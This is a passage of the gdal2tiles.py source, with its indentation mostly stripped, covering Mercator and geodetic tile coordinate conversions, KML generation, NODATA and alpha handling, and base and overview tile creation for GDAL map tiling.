Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum.
Well, the web clients like Google Maps are projecting those coordinates by
Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if
they were on the WGS84 ellipsoid.
From MSDN documentation:
To simplify the calculations, we use the spherical form of projection, not
the ellipsoidal form. Since the projection is used only for map display,
and not for displaying numeric coordinates, we don't need the extra precision
of an ellipsoidal projection. The spherical projection causes approximately
0.33 percent scale distortion in the Y direction, which is not visually
noticeable.
How do I create a raster in EPSG:3857 and convert coordinates with PROJ.4?
You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform.
All of these tools support -t_srs 'epsg:3857'.
For other GIS programs check the exact definition of the projection:
More info at http://spatialreference.org/ref/user/google-projection/
The same projection is designated as EPSG:3857. WKT definition is in the
official EPSG database.
Proj4 Text:
+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0
+k=1.0 +units=m +nadgrids=@null +no_defs
Human readable WKT format of EPSG:3857:
PROJCS["Google Maps Global Mercator",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4326"]],
PROJECTION["Mercator_1SP"],
PARAMETER["central_meridian",0],
PARAMETER["scale_factor",1],
PARAMETER["false_easting",0],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]]]
"""
def __init__(self, tileSize=256):
"Initialize the TMS Global Mercator pyramid"
self.tileSize = tileSize
self.initialResolution = 2 * math.pi * 6378137 / self.tileSize
# 156543.03392804062 for tileSize 256 pixels
self.originShift = 2 * math.pi * 6378137 / 2.0
# 20037508.342789244
def LatLonToMeters(self, lat, lon):
"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:3857"
mx = lon * self.originShift / 180.0
my = math.log(math.tan((90 + lat) * math.pi / 360.0)) / (math.pi / 180.0)
my = my * self.originShift / 180.0
return mx, my
def MetersToLatLon(self, mx, my):
"Converts XY point from Spherical Mercator EPSG:3857 to lat/lon in WGS84 Datum"
lon = (mx / self.originShift) * 180.0
lat = (my / self.originShift) * 180.0
lat = 180 / math.pi * (2 * math.atan(math.exp(lat * math.pi / 180.0)) - math.pi / 2.0)
return lat, lon
def PixelsToMeters(self, px, py, zoom):
"Converts pixel coordinates in given zoom level of pyramid to EPSG:3857"
res = self.Resolution(zoom)
mx = px * res - self.originShift
my = py * res - self.originShift
return mx, my
def MetersToPixels(self, mx, my, zoom):
"Converts EPSG:3857 to pyramid pixel coordinates in given zoom level"
res = self.Resolution(zoom)
px = (mx + self.originShift) / res
py = (my + self.originShift) / res
return px, py
def PixelsToTile(self, px, py):
"Returns a tile covering region in given pixel coordinates"
tx = int(math.ceil(px / float(self.tileSize)) - 1)
ty = int(math.ceil(py / float(self.tileSize)) - 1)
return tx, ty
def PixelsToRaster(self, px, py, zoom):
"Move the origin of pixel coordinates to top-left corner"
mapSize = self.tileSize << zoom
return px, mapSize - py
def MetersToTile(self, mx, my, zoom):
"Returns tile for given mercator coordinates"
px, py = self.MetersToPixels(mx, my, zoom)
return self.PixelsToTile(px, py)
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in EPSG:3857 coordinates"
minx, miny = self.PixelsToMeters(tx*self.tileSize, ty*self.tileSize, zoom)
maxx, maxy = self.PixelsToMeters((tx+1)*self.tileSize, (ty+1)*self.tileSize, zoom)
return (minx, miny, maxx, maxy)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in latitude/longitude using WGS84 datum"
bounds = self.TileBounds(tx, ty, zoom)
minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1])
maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3])
return (minLat, minLon, maxLat, maxLon)
def Resolution(self, zoom):
"Resolution (meters/pixel) for given zoom level (measured at Equator)"
# return (2 * math.pi * 6378137) / (self.tileSize * 2**zoom)
return self.initialResolution / (2**zoom)
def ZoomForPixelSize(self, pixelSize):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
if i != 0:
return i-1
else:
return 0 # We don't want to scale up
def GoogleTile(self, tx, ty, zoom):
"Converts TMS tile coordinates to Google Tile coordinates"
# coordinate origin is moved from bottom-left to top-left corner of the extent
return tx, (2**zoom - 1) - ty
def QuadTree(self, tx, ty, zoom):
"Converts TMS tile coordinates to Microsoft QuadTree"
quadKey = ""
ty = (2**zoom - 1) - ty
for i in range(zoom, 0, -1):
digit = 0
mask = 1 << (i-1)
if (tx & mask) != 0:
digit += 1
if (ty & mask) != 0:
digit += 2
quadKey += str(digit)
return quadKey
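# A minimal sketch of the conversions described in the class docstring; the
# coordinates below are arbitrary illustrative values.
def _example_global_mercator_usage():
    gm = GlobalMercator(tileSize=256)
    mx, my = gm.LatLonToMeters(47.0, 8.0)    # WGS84 lat/lon -> EPSG:3857 meters
    tx, ty = gm.MetersToTile(mx, my, 11)     # meters -> TMS tile at zoom 11
    gx, gy = gm.GoogleTile(tx, ty, 11)       # TMS -> Google/XYZ numbering (Y flipped)
    quadkey = gm.QuadTree(tx, ty, 11)        # TMS -> Microsoft QuadTree key
    swne = gm.TileLatLonBounds(tx, ty, 11)   # tile bounds back in lat/lon
    return (gx, gy), quadkey, swne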
class GlobalGeodetic(object):
r"""
TMS Global Geodetic Profile
---------------------------
Functions necessary for generation of global tiles in Plate Carre projection,
EPSG:4326, "unprojected profile".
Such tiles are compatible with Google Earth (as any other EPSG:4326 rasters)
and you can overlay the tiles on top of OpenLayers base map.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Geodetic tiles?
Global Geodetic tiles are using geodetic coordinates (latitude,longitude)
directly as planar coordinates XY (it is also called Unprojected or Plate
Carre). We need only scaling to pixel pyramid and cutting to tiles.
The pyramid has two tiles at the top level, so it is not square but rectangular.
Area [-180,-90,180,90] is scaled to 512x256 pixels.
TMS has coordinate origin (for pixels and tiles) in bottom-left corner.
Rasters are in EPSG:4326 and therefore are compatible with Google Earth.
LatLon <-> Pixels <-> Tiles
WGS84 coordinates Pixels in pyramid Tiles in pyramid
lat/lon XY pixels Z zoom XYZ from TMS
EPSG:4326
.----. ----
/ \ <-> /--------/ <-> TMS
\ / /--------------/
----- /--------------------/
WMS, KML Web Clients, Google Earth TileMapService
"""
def __init__(self, tmscompatible, tileSize=256):
self.tileSize = tileSize
if tmscompatible is not None:
# Defaults the resolution factor to 0.703125 (2 tiles @ level 0)
# Adheres to the OSGeo TMS spec
# http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification#global-geodetic
self.resFact = 180.0 / self.tileSize
else:
# Defaults the resolution factor to 1.40625 (1 tile @ level 0)
# Adheres to the OpenLayers, MapProxy, etc. default resolution for WMTS
self.resFact = 360.0 / self.tileSize
def LonLatToPixels(self, lon, lat, zoom):
"Converts lon/lat to pixel coordinates in given zoom of the EPSG:4326 pyramid"
res = self.resFact / 2**zoom
px = (180 + lon) / res
py = (90 + lat) / res
return px, py
def PixelsToTile(self, px, py):
"Returns coordinates of the tile covering region in pixel coordinates"
tx = int(math.ceil(px / float(self.tileSize)) - 1)
ty = int(math.ceil(py / float(self.tileSize)) - 1)
return tx, ty
def LonLatToTile(self, lon, lat, zoom):
"Returns the tile for zoom which covers given lon/lat coordinates"
px, py = self.LonLatToPixels(lon, lat, zoom)
return self.PixelsToTile(px, py)
def Resolution(self, zoom):
"Resolution (arc/pixel) for given zoom level (measured at Equator)"
return self.resFact / 2**zoom
def ZoomForPixelSize(self, pixelSize):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
if i != 0:
return i-1
else:
return 0 # We don't want to scale up
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile"
res = self.resFact / 2**zoom
return (
tx*self.tileSize*res - 180,
ty*self.tileSize*res - 90,
(tx+1)*self.tileSize*res - 180,
(ty+1)*self.tileSize*res - 90
)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in the SWNE form"
b = self.TileBounds(tx, ty, zoom)
return (b[1], b[0], b[3], b[2])
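# A minimal sketch of the geodetic profile helpers; lon/lat values are
# arbitrary illustrative values.
def _example_global_geodetic_usage():
    gg = GlobalGeodetic(tmscompatible=True)  # 2 tiles at zoom 0 (OSGeo TMS spec)
    tx, ty = gg.LonLatToTile(8.0, 47.0, 5)   # lon/lat -> TMS tile at zoom 5
    res = gg.Resolution(5)                   # degrees per pixel at zoom 5
    bounds = gg.TileBounds(tx, ty, 5)        # (minlon, minlat, maxlon, maxlat)
    return res, bounds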
class Zoomify(object):
"""
Tiles compatible with the Zoomify viewer
----------------------------------------
"""
def __init__(self, width, height, tilesize=256, tileformat='jpg'):
"""Initialization of the Zoomify tile tree"""
self.tilesize = tilesize
self.tileformat = tileformat
imagesize = (width, height)
tiles = (math.ceil(width / tilesize), math.ceil(height / tilesize))
# Size (in tiles) for each tier of pyramid.
self.tierSizeInTiles = []
self.tierSizeInTiles.append(tiles)
# Image size in pixels for each pyramid tier
self.tierImageSize = []
self.tierImageSize.append(imagesize)
while (imagesize[0] > tilesize or imagesize[1] > tilesize):
imagesize = (math.floor(imagesize[0] / 2), math.floor(imagesize[1] / 2))
tiles = (math.ceil(imagesize[0] / tilesize), math.ceil(imagesize[1] / tilesize))
self.tierSizeInTiles.append(tiles)
self.tierImageSize.append(imagesize)
self.tierSizeInTiles.reverse()
self.tierImageSize.reverse()
# Depth of the Zoomify pyramid, number of tiers (zoom levels)
self.numberOfTiers = len(self.tierSizeInTiles)
# Number of tiles up to the given tier of pyramid.
self.tileCountUpToTier = [0]
for i in range(1, self.numberOfTiers+1):
self.tileCountUpToTier.append(
self.tierSizeInTiles[i-1][0] * self.tierSizeInTiles[i-1][1] +
self.tileCountUpToTier[i-1]
)
def tilefilename(self, x, y, z):
"""Returns filename for tile with given coordinates"""
tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]
return os.path.join("TileGroup%.0f" % math.floor(tileIndex / 256),
"%s-%s-%s.%s" % (z, x, y, self.tileformat))
class GDALError(Exception):
pass
def exit_with_error(message, details=""):
# Message printing and exit code kept from the way it worked using the OptionParser (in case
# someone parses the error output)
sys.stderr.write("Usage: gdal2tiles.py [options] input_file [output]\n\n")
sys.stderr.write("gdal2tiles.py: error: %s\n" % message)
if details:
sys.stderr.write("\n\n%s\n" % details)
sys.exit(2)
def generate_kml(tx, ty, tz, tileext, tilesize, tileswne, options, children=None, **args):
"""
Template for the KML. Returns filled string.
"""
if not children:
children = []
args['tx'], args['ty'], args['tz'] = tx, ty, tz
args['tileformat'] = tileext
if 'tilesize' not in args:
args['tilesize'] = tilesize
if 'minlodpixels' not in args:
args['minlodpixels'] = int(args['tilesize'] / 2)
if 'maxlodpixels' not in args:
args['maxlodpixels'] = int(args['tilesize'] * 8)
if children == []:
args['maxlodpixels'] = -1
if tx is None:
tilekml = False
args['title'] = options.title
else:
tilekml = True
args['title'] = "%d/%d/%d.kml" % (tz, tx, ty)
args['south'], args['west'], args['north'], args['east'] = tileswne(tx, ty, tz)
if tx == 0:
args['drawOrder'] = 2 * tz + 1
elif tx is not None:
args['drawOrder'] = 2 * tz
else:
args['drawOrder'] = 0
url = options.url
if not url:
if tilekml:
url = "../../"
else:
url = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Document>
<name>%(title)s</name>
<description></description>
<Style>
<ListStyle id="hideChildren">
<listItemType>checkHideChildren</listItemType>
</ListStyle>
</Style>""" % args
if tilekml:
s += """
<Region>
<LatLonAltBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%(minlodpixels)d</minLodPixels>
<maxLodPixels>%(maxlodpixels)d</maxLodPixels>
</Lod>
</Region>
<GroundOverlay>
<drawOrder>%(drawOrder)d</drawOrder>
<Icon>
<href>%(ty)d.%(tileformat)s</href>
</Icon>
<LatLonBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonBox>
</GroundOverlay>
""" % args
for cx, cy, cz in children:
csouth, cwest, cnorth, ceast = tileswne(cx, cy, cz)
s += """
<NetworkLink>
<name>%d/%d/%d.%s</name>
<Region>
<LatLonAltBox>
<north>%.14f</north>
<south>%.14f</south>
<east>%.14f</east>
<west>%.14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%d</minLodPixels>
<maxLodPixels>-1</maxLodPixels>
</Lod>
</Region>
<Link>
<href>%s%d/%d/%d.kml</href>
<viewRefreshMode>onRegion</viewRefreshMode>
<viewFormat/>
</Link>
</NetworkLink>
""" % (cz, cx, cy, args['tileformat'], cnorth, csouth, ceast, cwest,
args['minlodpixels'], url, cz, cx, cy)
s += """ </Document>
</kml>
"""
return s
def scale_query_to_tile(dsquery, dstile, tiledriver, options, tilefilename=''):
"""Scales down query dataset to the tile dataset"""
querysize = dsquery.RasterXSize
tilesize = dstile.RasterXSize
tilebands = dstile.RasterCount
if options.resampling == 'average':
# Function: gdal.RegenerateOverview()
for i in range(1, tilebands+1):
# Black border around NODATA
res = gdal.RegenerateOverview(dsquery.GetRasterBand(i), dstile.GetRasterBand(i),
'average')
if res != 0:
exit_with_error("RegenerateOverview() failed on %s, error %d" % (
tilefilename, res))
elif options.resampling == 'antialias':
# Scaling by PIL (Python Imaging Library) - improved Lanczos
array = numpy.zeros((querysize, querysize, tilebands), numpy.uint8)
for i in range(tilebands):
array[:, :, i] = gdalarray.BandReadAsArray(dsquery.GetRasterBand(i+1),
0, 0, querysize, querysize)
im = Image.fromarray(array, 'RGBA') # Always four bands
im1 = im.resize((tilesize, tilesize), Image.ANTIALIAS)
if os.path.exists(tilefilename):
im0 = Image.open(tilefilename)
im1 = Image.composite(im1, im0, im1)
im1.save(tilefilename, tiledriver)
else:
if options.resampling == 'near':
gdal_resampling = gdal.GRA_NearestNeighbour
elif options.resampling == 'bilinear':
gdal_resampling = gdal.GRA_Bilinear
elif options.resampling == 'cubic':
gdal_resampling = gdal.GRA_Cubic
elif options.resampling == 'cubicspline':
gdal_resampling = gdal.GRA_CubicSpline
elif options.resampling == 'lanczos':
gdal_resampling = gdal.GRA_Lanczos
# Other algorithms are implemented by gdal.ReprojectImage().
dsquery.SetGeoTransform((0.0, tilesize / float(querysize), 0.0, 0.0, 0.0,
tilesize / float(querysize)))
dstile.SetGeoTransform((0.0, 1.0, 0.0, 0.0, 0.0, 1.0))
res = gdal.ReprojectImage(dsquery, dstile, None, None, gdal_resampling)
if res != 0:
exit_with_error("ReprojectImage() failed on %s, error %d" % (tilefilename, res))
def setup_no_data_values(input_dataset, options):
"""
Extract the NODATA values from the dataset or use the passed arguments as override if any
"""
in_nodata = []
if options.srcnodata:
nds = list(map(float, options.srcnodata.split(',')))
if len(nds) < input_dataset.RasterCount:
in_nodata = (nds * input_dataset.RasterCount)[:input_dataset.RasterCount]
else:
in_nodata = nds
else:
for i in range(1, input_dataset.RasterCount+1):
raster_no_data = input_dataset.GetRasterBand(i).GetNoDataValue()
if raster_no_data is not None:
in_nodata.append(raster_no_data)
if options.verbose:
print("NODATA: %s" % in_nodata)
return in_nodata
def setup_input_srs(input_dataset, options):
"""
Determines and returns the Input Spatial Reference System (SRS) as an osr object and as a
WKT representation
Uses in priority the one passed in the command line arguments. If None, tries to extract them
from the input dataset
"""
input_srs = None
input_srs_wkt = None
if options.s_srs:
input_srs = osr.SpatialReference()
input_srs.SetFromUserInput(options.s_srs)
input_srs_wkt = input_srs.ExportToWkt()
else:
input_srs_wkt = input_dataset.GetProjection()
if not input_srs_wkt and input_dataset.GetGCPCount() != 0:
input_srs_wkt = input_dataset.GetGCPProjection()
if input_srs_wkt:
input_srs = osr.SpatialReference()
input_srs.ImportFromWkt(input_srs_wkt)
return input_srs, input_srs_wkt
def setup_output_srs(input_srs, options):
"""
Setup the desired SRS (based on options)
"""
output_srs = osr.SpatialReference()
if options.profile == 'mercator':
output_srs.ImportFromEPSG(3857)
elif options.profile == 'geodetic':
output_srs.ImportFromEPSG(4326)
else:
output_srs = input_srs
return output_srs
def has_georeference(dataset):
return (dataset.GetGeoTransform() != (0.0, 1.0, 0.0, 0.0, 0.0, 1.0) or
dataset.GetGCPCount() != 0)
def reproject_dataset(from_dataset, from_srs, to_srs, options=None):
"""
Returns the input dataset in the expected "destination" SRS.
If the dataset is already in the correct SRS, returns it unmodified
"""
if not from_srs or not to_srs:
raise GDALError("from and to SRS must be defined to reproject the dataset")
if (from_srs.ExportToProj4() != to_srs.ExportToProj4()) or (from_dataset.GetGCPCount() != 0):
to_dataset = gdal.AutoCreateWarpedVRT(from_dataset,
from_srs.ExportToWkt(), to_srs.ExportToWkt())
if options and options.verbose:
print("Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')")
to_dataset.GetDriver().CreateCopy("tiles.vrt", to_dataset)
return to_dataset
else:
return from_dataset
def add_gdal_warp_options_to_string(vrt_string, warp_options):
if not warp_options:
return vrt_string
vrt_root = ElementTree.fromstring(vrt_string)
options = vrt_root.find("GDALWarpOptions")
if options is None:
return vrt_string
for key, value in warp_options.items():
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": key})
tb.data(value)
tb.end("Option")
elem = tb.close()
options.insert(0, elem)
return ElementTree.tostring(vrt_root).decode()
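# For example, passing warp_options={"INIT_DEST": "NO_DATA"} inserts
#   <Option name="INIT_DEST">NO_DATA</Option>
# as the first child of the <GDALWarpOptions> element in the VRT.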
def update_no_data_values(warped_vrt_dataset, nodata_values, options=None):
"""
Takes an array of NODATA values and forces them on the WarpedVRT file dataset passed
"""
# TODO: gbataille - Seems that I forgot tests there
if nodata_values != []:
temp_file = gettempfilename('-gdal2tiles.vrt')
warped_vrt_dataset.GetDriver().CreateCopy(temp_file, warped_vrt_dataset)
with open(temp_file, 'r') as f:
vrt_string = f.read()
vrt_string = add_gdal_warp_options_to_string(
vrt_string, {"INIT_DEST": "NO_DATA", "UNIFIED_SRC_NODATA": "YES"})
# TODO: gbataille - check the need for this replacement. Seems to work without
# # replace BandMapping tag for NODATA bands....
# for i in range(len(nodata_values)):
# s = s.replace(
# '<BandMapping src="%i" dst="%i"/>' % ((i+1), (i+1)),
# """
# <BandMapping src="%i" dst="%i">
# <SrcNoDataReal>%i</SrcNoDataReal>
# <SrcNoDataImag>0</SrcNoDataImag>
# <DstNoDataReal>%i</DstNoDataReal>
# <DstNoDataImag>0</DstNoDataImag>
# </BandMapping>
# """ % ((i+1), (i+1), nodata_values[i], nodata_values[i]))
# save the corrected VRT
with open(temp_file, 'w') as f:
f.write(vrt_string)
corrected_dataset = gdal.Open(temp_file)
os.unlink(temp_file)
# set NODATA_VALUE metadata
corrected_dataset.SetMetadataItem(
'NODATA_VALUES', ' '.join([str(i) for i in nodata_values]))
if options and options.verbose:
print("Modified warping result saved into 'tiles1.vrt'")
# TODO: gbataille - test replacing that with a gdal write of the dataset (more
# accurately what's used, even if should be the same
with open("tiles1.vrt", "w") as f:
f.write(vrt_string)
return corrected_dataset
def add_alpha_band_to_string_vrt(vrt_string):
# TODO: gbataille - Old code speak of this being equivalent to gdalwarp -dstalpha
# To be checked
vrt_root = ElementTree.fromstring(vrt_string)
index = 0
nb_bands = 0
for subelem in list(vrt_root):
if subelem.tag == "VRTRasterBand":
nb_bands += 1
color_node = subelem.find("./ColorInterp")
if color_node is not None and color_node.text == "Alpha":
raise Exception("Alpha band already present")
else:
if nb_bands:
# This means that we are one element after the Band definitions
break
index += 1
tb = ElementTree.TreeBuilder()
tb.start("VRTRasterBand",
{'dataType': "Byte", "band": str(nb_bands + 1), "subClass": "VRTWarpedRasterBand"})
tb.start("ColorInterp", {})
tb.data("Alpha")
tb.end("ColorInterp")
tb.end("VRTRasterBand")
elem = tb.close()
vrt_root.insert(index, elem)
warp_options = vrt_root.find(".//GDALWarpOptions")
tb = ElementTree.TreeBuilder()
tb.start("DstAlphaBand", {})
tb.data(str(nb_bands + 1))
tb.end("DstAlphaBand")
elem = tb.close()
warp_options.append(elem)
# TODO: gbataille - this is a GDALWarpOptions. Why put it in a specific place?
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": "INIT_DEST"})
tb.data("0")
tb.end("Option")
elem = tb.close()
warp_options.append(elem)
return ElementTree.tostring(vrt_root).decode()
def update_alpha_value_for_non_alpha_inputs(warped_vrt_dataset, options=None):
"""
Handles datasets with 1 or 3 bands, i.e. without an alpha channel, in case the NODATA value has
not been forced by options
"""
if warped_vrt_dataset.RasterCount in [1, 3]:
tempfilename = gettempfilename('-gdal2tiles.vrt')
warped_vrt_dataset.GetDriver().CreateCopy(tempfilename, warped_vrt_dataset)
with open(tempfilename) as f:
orig_data = f.read()
alpha_data = add_alpha_band_to_string_vrt(orig_data)
with open(tempfilename, 'w') as f:
f.write(alpha_data)
warped_vrt_dataset = gdal.Open(tempfilename)
os.unlink(tempfilename)
if options and options.verbose:
print("Modified -dstalpha warping result saved into 'tiles1.vrt'")
# TODO: gbataille - test replacing that with a gdal write of the dataset (more
# accurately what's used, even if should be the same
with open("tiles1.vrt", "w") as f:
f.write(alpha_data)
return warped_vrt_dataset
def nb_data_bands(dataset):
"""
Return the number of data (non-alpha) bands of a gdal dataset
"""
alphaband = dataset.GetRasterBand(1).GetMaskBand()
if ((alphaband.GetMaskFlags() & gdal.GMF_ALPHA) or
dataset.RasterCount == 4 or
dataset.RasterCount == 2):
return dataset.RasterCount - 1
else:
return dataset.RasterCount
def gettempfilename(suffix):
"""Returns a temporary filename"""
if '_' in os.environ:
# tempfile.mktemp() crashes on some Wine versions (the one of Ubuntu 12.04 particularly)
if os.environ['_'].find('wine') >= 0:
tmpdir = '.'
if 'TMP' in os.environ:
tmpdir = os.environ['TMP']
import time
import random
random.seed(time.time())
random_part = 'file%d' % random.randint(0, 1000000000)
return os.path.join(tmpdir, random_part + suffix)
return tempfile.mktemp(suffix)
def create_base_tile(tile_job_info, tile_detail, options, queue=None):
gdal.AllRegister()
dataBandsCount = tile_job_info.nb_data_bands
output = tile_job_info.output_file_path
tileext = tile_job_info.tile_extension
tilesize = tile_job_info.tile_size
options = tile_job_info.options
tilebands = dataBandsCount + 1
ds = gdal.Open(tile_job_info.src_file, gdal.GA_ReadOnly)
mem_drv = gdal.GetDriverByName('MEM')
out_drv = gdal.GetDriverByName(tile_job_info.tile_driver)
alphaband = ds.GetRasterBand(1).GetMaskBand()
tx = tile_detail.tx
ty = tile_detail.ty
tz = tile_detail.tz
rx = tile_detail.rx
ry = tile_detail.ry
rxsize = tile_detail.rxsize
rysize = tile_detail.rysize
wx = tile_detail.wx
wy = tile_detail.wy
wxsize = tile_detail.wxsize
wysize = tile_detail.wysize
querysize = tile_detail.querysize
# Tile dataset in memory
tilefilename = os.path.join(
output, str(tz), str(tx), "%s.%s" % (ty, tileext))
dstile = mem_drv.Create('', tilesize, tilesize, tilebands)
data = alpha = None
if options.verbose:
print("\tReadRaster Extent: ",
(rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize))
# The query is done with 'nearest neighbour' but can be bigger than the tilesize.
# We scale the query down to the tilesize with the supplied resampling algorithm.
if rxsize != 0 and rysize != 0 and wxsize != 0 and wysize != 0:
data = ds.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize,
band_list=list(range(1, dataBandsCount+1)))
alpha = alphaband.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize)
# The tile in memory is a transparent file by default. Write pixel values into it if
# any
if data:
if tilesize == querysize:
# Use the ReadRaster result directly in tiles ('nearest neighbour' query)
dstile.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount+1)))
dstile.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
# Note: For source drivers based on WaveLet compression (JPEG2000, ECW,
# MrSID) the ReadRaster function returns high-quality raster (not ugly
# nearest neighbour)
# TODO: Use directly 'near' for WaveLet files
else:
# Big ReadRaster query in memory scaled to the tilesize - all but 'near'
# algo
dsquery = mem_drv.Create('', querysize, querysize, tilebands)
# TODO: fill the null value in case a tile without alpha is produced (now
# only png tiles are supported)
dsquery.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount+1)))
dsquery.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
scale_query_to_tile(dsquery, dstile, tile_job_info.tile_driver, options,
tilefilename=tilefilename)
del dsquery
# Force freeing the memory to make sure the C++ destructor is called and the memory as well as
# the file locks are released
del ds
del data
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_drv.CreateCopy(tilefilename, dstile, strict=0)
del dstile
# Create a KML file for this tile.
if tile_job_info.kml:
kmlfilename = os.path.join(output, str(tz), str(tx), '%d.kml' % ty)
if not options.resume or not os.path.exists(kmlfilename):
with open(kmlfilename, 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
tile_job_info.tile_swne, tile_job_info.options
).encode('utf-8'))
if queue:
queue.put("tile %s %s %s" % (tx, ty, tz))
def create_overview_tiles(tile_job_info, output_folder, options):
"""Generation of the overview tiles (higher in the pyramid) based on existing tiles"""
mem_driver = gdal.GetDriverByName('MEM')
tile_driver = tile_job_info.tile_driver
out_driver = gdal.GetDriverByName(tile_driver)
tilebands = tile_job_info.nb_data_bands + 1
# Usage of existing tiles: from 4 underlying tiles generate one as overview.
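# i.e. overview tile (tz, tx, ty) is assembled from the four base tiles
# (tz+1, 2*tx..2*tx+1, 2*ty..2*ty+1): they are pasted into a query window of
# twice the tile size and then scaled back down by scale_query_to_tile().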
tcount = 0
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
tcount += (1 + abs(tmaxx-tminx)) * (1 + abs(tmaxy-tminy))
ti = 0
if tcount == 0:
return
if not options.quiet:
print("Generating Overview Tiles:")
progress_bar = ProgressBar(tcount)
progress_bar.start()
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
for ty in range(tmaxy, tminy - 1, -1):
for tx in range(tminx, tmaxx + 1):
ti += 1
ytile = GDAL2Tiles.getYtile(ty, tz, options)
tilefilename = os.path.join(output_folder,
str(tz),
str(tx),
"%s.%s" % (ytile, tile_job_info.tile_extension))
if options.verbose:
print(ti, '/', tcount, tilefilename)
if options.resume and os.path.exists(tilefilename):
if options.verbose:
print("Tile generation skipped because of --resume")
else:
progress_bar.log_progress()
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
dsquery = mem_driver.Create('', 2 * tile_job_info.tile_size,
2 * tile_job_info.tile_size, tilebands)
# TODO: fill the null value
dstile = mem_driver.Create('', tile_job_info.tile_size, tile_job_info.tile_size,
tilebands)
# TODO: Implement more clever walking on the tiles with cache functionality
# probably walk should start with reading of four tiles from top left corner
# Hilbert curve
children = []
# Read the tiles and write them to query window
for y in range(2 * ty, 2 * ty + 2):
for x in range(2 * tx, 2 * tx + 2):
minx, miny, maxx, maxy = tile_job_info.tminmax[tz + 1]
if x >= minx and x <= maxx and y >= miny and y <= maxy:
ytile2 = GDAL2Tiles.getYtile(y, tz+1, options)
dsquerytile = gdal.Open(
os.path.join(output_folder, str(tz + 1), str(x),
"%s.%s" % (ytile2, tile_job_info.tile_extension)),
gdal.GA_ReadOnly)
if (ty == 0 and y == 1) or (ty != 0 and (y % (2 * ty)) != 0):
tileposy = 0
else:
tileposy = tile_job_info.tile_size
if tx:
tileposx = x % (2 * tx) * tile_job_info.tile_size
elif tx == 0 and x == 1:
tileposx = tile_job_info.tile_size
else:
tileposx = 0
dsquery.WriteRaster(
tileposx, tileposy, tile_job_info.tile_size,
tile_job_info.tile_size,
dsquerytile.ReadRaster(0, 0,
tile_job_info.tile_size,
tile_job_info.tile_size),
band_list=list(range(1, tilebands + 1)))
children.append([x, y, tz + 1])
scale_query_to_tile(dsquery, dstile, tile_driver, options,
tilefilename=tilefilename)
# Write a copy of tile to png/jpg
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_driver.CreateCopy(tilefilename, dstile, strict=0)
if options.verbose:
print("\tbuild from zoom", tz + 1,
" tiles:", (2 * tx, 2 * ty), (2 * tx + 1, 2 * ty),
(2 * tx, 2 * ty + 1), (2 * tx + 1, 2 * ty + 1))
# Create a KML file for this tile.
if tile_job_info.kml:
with open(os.path.join(
output_folder,
'%d/%d/%d.kml' % (tz, tx, ty)
), 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
get_tile_swne(tile_job_info, options), options, children
).encode('utf-8'))
if not options.verbose and not options.quiet:
progress_bar.log_progress()
def optparse_init():
"""Prepare the option parser for input (argv)"""
from optparse import OptionParser, OptionGroup
usage = "Usage: %prog [options] input_file [output]"
p = OptionParser(usage, version="%prog " + __version__)
p.add_option("-p", "--profile", dest='profile',
type='choice', choices=profile_list,
help=("Tile cutting profile (%s) - default 'mercator' "
"(Google Maps compatible)" % ",".join(profile_list)))
p.add_option("-r", "--resampling", dest="resampling",
type='choice', choices=resampling_list,
help="Resampling method (%s) - default 'average'" % ",".join(resampling_list))
p.add_option("-s", "--s_srs", dest="s_srs", metavar="SRS",
